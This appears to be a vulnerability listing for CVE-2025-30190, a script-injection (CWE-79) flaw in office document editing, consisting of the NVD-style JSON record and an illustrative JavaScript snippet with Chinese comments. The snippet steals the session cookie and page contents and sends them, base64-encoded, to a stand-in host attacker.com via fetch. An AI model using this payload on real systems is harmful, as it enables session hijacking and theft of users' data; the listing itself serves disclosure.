CVE-2025-30190

<!-- 恶意Office文档中嵌入的JavaScript代码示例 --> <script> // 窃取用户会话令牌 var sessionToken = document.cookie; // 发送窃取的数据到攻击者服务器 fetch('https://attacker.com/steal?data=' + btoa(sessionToken), { method: 'GET', mode: 'no-cors' }); // 读取文档内容并外传 var docContent = document.body.innerHTML; fetch('https://attacker.com/exfil?content=' + btoa(docContent), { method: 'POST', headers: {'Content-Type': 'application/json'}, body: JSON.stringify({content: docContent}) }); </script>

{"cve": {"id": "CVE-2025-30190", "sourceIdentifier": "[email protected]", "published": "2025-11-27T10:15:51.640", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Malicious content at office documents can be used to inject script code when editing a document. Unintended actions can be executed in the context of the users account, including exfiltration of sensitive information. Please deploy the provided updates and patch releases. No publicly available exploits are known"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://documentation.open-xchange.com/appsuite/security/advisories/csaf/2025/oxas-adv-2025-0003.json", "source": "[email protected]"}]}}